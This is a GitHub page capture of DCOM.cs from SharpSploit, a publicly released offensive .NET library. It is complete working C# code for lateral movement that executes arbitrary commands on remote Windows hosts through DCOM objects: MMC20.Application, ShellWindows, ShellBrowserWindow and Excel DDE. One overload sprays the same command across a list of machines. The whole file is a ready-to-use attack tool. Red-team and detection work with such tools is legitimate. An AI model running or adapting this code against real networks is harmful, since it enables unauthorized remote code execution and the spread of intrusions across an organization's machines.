-
Notifications
You must be signed in to change notification settings - Fork 305
/
DCOM.cs
112 lines (104 loc) · 6.22 KB
/
DCOM.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
// Author: Ryan Cobb (@cobbr_io)
// Project: SharpSploit (https://github.com/cobbr/SharpSploit)
// License: BSD 3-Clause
using System;
using System.Linq;
using System.Reflection;
using System.Collections.Generic;
namespace SharpSploit.LateralMovement
{
/// <summary>
/// DCOM is a class for executing DCOM lateral movement techniques.
/// </summary>
public class DCOM
{
/// <summary>
/// Execute a process on a remote system using various DCOM methods.
/// </summary>
/// <param name="ComputerName">ComputerName of remote system to execute process.</param>
/// <param name="Command">Command to execute on remote system.</param>
/// <param name="Parameters"></param>
/// <param name="Directory"></param>
/// <param name="Method">DCOM execution method to use. Defaults to MMC20.Application.</param>
/// <returns>Bool. True if execution succeeds, false otherwise.</returns>
/// <remarks>
/// Credit for the DCOM lateral movement techniques goes to Matt Nelson (@enigma0x3). This is
/// a port of Steve Borosh (rvrshell)'s Invoke-DCOM implementation available
/// here: https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Invoke-DCOM.ps1
/// </remarks>
public static bool DCOMExecute(string ComputerName, string Command, string Parameters = "", string Directory = "C:\\WINDOWS\\System32\\", DCOMMethod Method = DCOMMethod.MMC20_Application)
{
try
{
if (Method == DCOMMethod.MMC20_Application)
{
Type ComType = Type.GetTypeFromProgID("MMC20.Application", ComputerName);
object RemoteComObject = Activator.CreateInstance(ComType);
object Document = RemoteComObject.GetType().InvokeMember("Document", BindingFlags.GetProperty, null, RemoteComObject, null);
object ActiveView = Document.GetType().InvokeMember("ActiveView", BindingFlags.GetProperty, null, Document, null);
ActiveView.GetType().InvokeMember("ExecuteShellCommand", BindingFlags.InvokeMethod, null, ActiveView, new object[] { Command, Directory, Parameters, "7" });
}
else if (Method == DCOMMethod.ShellWindows)
{
Type ComType = Type.GetTypeFromCLSID(CLSIDs[Method], ComputerName);
object RemoteComObject = Activator.CreateInstance(ComType);
object Item = RemoteComObject.GetType().InvokeMember("Item", BindingFlags.InvokeMethod, null, RemoteComObject, new object[] { });
object Document = Item.GetType().InvokeMember("Document", BindingFlags.GetProperty, null, Item, null);
object Application = Document.GetType().InvokeMember("Application", BindingFlags.GetProperty, null, Document, null);
Application.GetType().InvokeMember("ShellExecute", BindingFlags.InvokeMethod, null, Application, new object[] { Command, Parameters, Directory, null, 0 });
}
else if (Method == DCOMMethod.ShellBrowserWindow)
{
Type ComType = Type.GetTypeFromCLSID(CLSIDs[Method], ComputerName);
object RemoteComObject = Activator.CreateInstance(ComType);
object Document = RemoteComObject.GetType().InvokeMember("Document", BindingFlags.GetProperty, null, RemoteComObject, null);
object Application = Document.GetType().InvokeMember("Application", BindingFlags.GetProperty, null, Document, null);
Application.GetType().InvokeMember("ShellExecute", BindingFlags.InvokeMethod, null, Application, new object[] { Command, Parameters, Directory, null, 0 });
}
else if (Method == DCOMMethod.ExcelDDE)
{
Type ComType = Type.GetTypeFromProgID("Excel.Application", ComputerName);
object RemoteComObject = Activator.CreateInstance(ComType);
RemoteComObject.GetType().InvokeMember("DisplayAlerts", BindingFlags.SetProperty, null, RemoteComObject, new object[] { false });
RemoteComObject.GetType().InvokeMember("DDEInitiate", BindingFlags.InvokeMethod, null, RemoteComObject, new object[] { Command, Parameters });
}
return true;
}
catch (Exception e)
{
Console.Error.WriteLine("DCOM Failed: " + e.Message);
}
return false;
}
/// <summary>
/// Execute a process on a remote system using various DCOM methods.
/// </summary>
/// <param name="ComputerNames">ComputerNames of remote systems to execute process.</param>
/// <param name="Command">Command to execute on remote system.</param>
/// <param name="Parameters"></param>
/// <param name="Directory"></param>
/// <param name="Method">DCOM execution method to use. Defaults to MMC20.Application.</param>
/// <returns>Bool. True if execution succeeds, false otherwise.</returns>
/// <remarks>
/// Credit for the DCOM lateral movement techniques goes to Matt Nelson (@enigma0x3). This is
/// a port of Steve Borosh (rvrshell)'s Invoke-DCOM implementation available
/// here: https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Invoke-DCOM.ps1
/// </remarks>
public static List<bool> DCOMExecute(List<string> ComputerNames, string Command, string Parameters = "", string Directory = "C:\\WINDOWS\\System32\\", DCOMMethod Method = DCOMMethod.MMC20_Application)
{
return ComputerNames.Select(CN => DCOMExecute(CN, Command, Parameters, Directory, Method)).ToList();
}
public enum DCOMMethod
{
MMC20_Application,
ShellWindows,
ShellBrowserWindow,
ExcelDDE
}
private static readonly Dictionary<DCOMMethod, Guid> CLSIDs = new Dictionary<DCOMMethod, Guid>
{
{ DCOMMethod.ShellWindows, new Guid("9BA05972-F6A8-11CF-A442-00A0C90A8F39") },
{ DCOMMethod.ShellBrowserWindow, new Guid("C08AFD90-F2A1-11D1-8455-00A0C91F3880") }
};
}
}